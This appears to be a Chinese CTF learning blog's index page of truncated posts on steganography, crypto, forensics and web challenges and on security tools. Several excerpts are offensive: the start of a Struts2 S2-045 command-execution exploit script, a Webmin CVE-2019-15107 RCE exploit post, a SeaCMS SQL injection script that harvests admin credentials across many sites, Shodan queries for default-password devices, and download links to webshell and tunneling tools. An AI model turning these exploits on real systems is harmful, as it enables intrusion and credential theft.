「配枪朱丽叶。」

RootのCTF学习笔记。

工具

V&N2020 公开赛-MISC部分学习笔记

[V&N2020 公开赛]拉胯的三条命令 在参加网络安全大赛第二届世界巡回赛新加坡站一场与SP战队的比赛时,作为K&K战队主防手的你使用经典的“三条命令”检查端口封闭状况。可是这次比赛平台没有回显,你能查出来有哪些端口是开放的嘛? 请将开放端口按由小到大顺序…

ctfshow:STEGA部分做题记录

stega1 题目下载 我要好好批评自己!!有工具想不到! 用010还有binwalk操作了一顿都没有找到什么,因为格式是jpg,有一种针对jpg的隐写工具叫jphs。 载入后点击Seek,不用填密码,直接保存就可以得到flag。stega10 strings这个文件发现一串可疑字符: aHR0c…

AFCTF2018/BUUCTF-Crypto:One Secret, Two encryption

题目下载 先分别求一下n和e。 SSL在线工具-公钥解析public1.pub: e = 16666266329603682390011594080477659912702500422062441574471711881956573029330195019321017779995100012357363388431077098717859067493930042576141298020610811558614337223801450…

hackthebox MISC-0ld is g0ld

题目下载 题中已经给了解压密码是:hackthebox。 得到一个pdf,考虑到靶场flag的格式,尝试strings 文件|grep HTB{看看能不能捡漏。。但是并没有什么发现。学习到一个工具叫:pdfcrack 安装: apt install pdfcrack简单的使用: pdfcrack -f 文件 -n 6 -m 8 …

湖南省赛2019/BUUCTF-Misc:Findme

题目下载 这道题挺恶熏的T T记录一哈。感谢群里提供WP的师傅和RichardTang师傅。1.png 其中第一张根据做题经验明显需要修改宽高。 CRC爆破宽和高的脚本: import zlib import struct file = '1.png' fr = open(file,'rb').read() data = bytearray(fr[12:29]…

HITCON2018/BUUCTF-ev3basic

题目下载 开局一个图,binwalk -e 文件可以分离出图片和数据包。 如你所见,一堆根本不知道是啥的协议。。查了下资料,github上的这个ev3工具很有用: lms-hacker-tools/EV3 at master · ev3dev/lms-hacker-tools · GitHub 照着readme去做,执行这个命令: w…

w3af简单使用教程

w3af(Web Application Attack and Audit Framework)是一个Web应用程序攻击和审计框架。它的目标是创建一个易于使用和扩展、能够发现和利用Web应用程序漏洞的主体框架。w3af的核心代码和插件完全由Python编写。项目已有超过130个的插件,这些插件可以检测SQ…

安洵杯 2019/BUUCTF-Attack

题目下载 对流量包进行文件提取(output)命令,得到一个加密的压缩包文件。 用Wireshark打开,文件→导出对象→HTTP,发现lsass.dmp。 通过这道题我也GET到了新知识点ww开心。 lsass是windows系统的一个进程,用于本地安全和登陆策略。 题外话: 如何获取lsas…

2019_NJUPTCTF/攻防世界:MISC-Become_a_Rockstar

题目下载 一个名字为Become_a_Rockstar.rock的文件,打开只有这几句话: Leonard Adleman says star Problem Makers is Problem Makers Problem Makers says NCTF{ God takes World A boy says flag The boy is Bob Evil takes your mind A girl says no fla…

GXYCTF2019/BUUCTF-WEB:禁止套娃

主页只有一句:flag在哪里呢?经测试存在/.git,可以利用githack读取源代码。 GitHub - lijiejie/GitHack: A `.git` folder disclosure exploit "; if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])…

RGB值转图片通用脚本ouo

#-*- coding:utf-8 -*- from PIL import Image import re def RGB2pic_main(): print('请先用因数分解(被分解数为RGB.txt行数),计算可能的尺寸x,y') x = int(input('x=')) #x坐标 通过对txt里的行数进行整数分解 y = int(input('y=')) #y坐标 x*y = 行数 im…

GWCTF 2019 WEB-枯燥的抽奖

哈哈,打开给👵逗乐了。 查看源代码,发现check.php:

S2-045攻击脚本

#!/usr/bin/python # -*- coding: utf-8 -*- import urllib2 import httplib def exploit(url, cmd): payload = "%{(#_='multipart/form-data')." payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." payload += "(#_memberAccess?" payload += "…

BUUCTF-Business Planning Group

题目下载 一个普通的PNG图片。常规操作梭完之后没有任何发现。。 学习到了一种新的图片格式:BPG BPG格式,全称“Better Portable Graphics”(更好的便携式图像),它是一个声称比现时最流行的JPEG压缩格式更优秀的图像压缩方案,由法国的程序员法布里斯·贝拉…

记一道红帽杯CTF隐写题浅学Volatility

Misc - Advertising for Marriage 题目下载 下载下来是一个后缀名为raw的文件。通过学习文章得知: 内存取证三项CTF赛题详解 - FreeBuf互联网安全新媒体平台 CTF中文件包含的一些技巧 - i春秋学院 - 博客园 这种raw文件是内存取证工具Dumpit提取内存生成的内…

攻防世界crypto:cr2-many-time-secrets

题目下载 这题打开是这样的: 0529242a631234122d2b36697f13272c207f2021283a6b0c7908 2f28202a302029142c653f3c7f2a2636273e3f2d653e25217908 322921780c3a235b3c2c3f207f372e21733a3a2b37263b313012 2f6c363b2b312b1e64651b6537222e37377f2020242b6b2c2d5d…

Kali Linux 更新源配置

查看添加更新源 编辑sources.list,将kali更新源加入其中sudo vim /etc/apt/sources.list 国内更新源 #阿里云 deb http://mirrors.aliyun.com/kali kali-rolling main non-free contrib deb-src http://mirrors.aliyun.com/kali kali-rolling main non-free c…

Webmin未经身份验证的远程代码执行(CVE-2019-15107)exp

Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令…

关于PHP中md5比较绕过方式的总结

自己写的Seacms漏洞利用脚本

SeaCMS V9.1以下版本SQL注入漏洞 获取管理员表的第一个用户的账号和管理员表中第一个用户的密码的md5值需要在脚本的同级目录新建一个dir.txt里面存放网址 #SeaCMS #Author:Root import requests import time import re dir = open('dir.txt','r') for i in …

科莱杯山东省赛 _Crypto- affine (仿射密码脚本)

y = 17x-8 flag{szzyfimhyzd} 答案格式:flag{*} #仿射密码解密 #改进欧几里得算法求线性方程的x与y def get(a, b): if b == 0: return 1, 0 else: k = a //b remainder = a % b x1, y1 = get(b, remainder) x, y =y1, x1 - k * y1 return x, y s = input("…

WhaleCTF-德军密码(费纳姆密码)

二战时盟军截获德军一段密码,密文为:0000011000000000101010110111001011000101100000111001100100111100111001(密钥:helloworld),你可能会解出一个keyxxxxx的答案,请在y后面加{,结尾加},答案的格式是key{xxxxx},所以答案是?不难看出是费纳姆密码…

WhaleCTF-Decode8(凯撒解密脚本)

凯撒和某某加密,“aZZg/x\ZbavpZiEZp+n)o+“,格式flag{xxxx} 下面是一个凯撒移位脚本: # 实现33-126ASCII能打印的字符循环平移 # 和通常凯撒加密不同注意 def change(c, i): num = ord(c) if (num >= 33 and num <= 126): num = 33 + (num + i - 33) % (94) …

Shodan新手语法总结

查找位于国内的 Nginx 服务器: nginx country:"CN" 查找 GWS(Google Web Server) 服务器: "Server: gws" hostname:"google" NetSureveillance Web用户名admin密码为空: Server: uc-httpd 1.0.0 200 OK Country:"CN" 搜缺省密码: "default password" city…

XCTF-keyword

题目描述:格式为QCTF{XXX} 附件 用stegsolve图片隐写神器发现图片上方有黑色的块块,疑似lsb隐写。。但是没发现什么 后来用了这个脚本: GitHub - livz/cloacked-pixel: LSB steganography and detection python lsb.py extract a63369affda14efeaa2a61ae57…

reGeorg+Proxifier 工具下载和使用教程

【冰蝎菜刀-自用】 https://pan.baidu.com/s/1yKnVNrXjzgJfJ3W2fMRQyg kx2x【reGeorg】 https://pan.baidu.com/s/1YtM7zQBQMXdnwhVZ-PMT0w xr9x 【使用教程】 https://xz.aliyun.com/t/228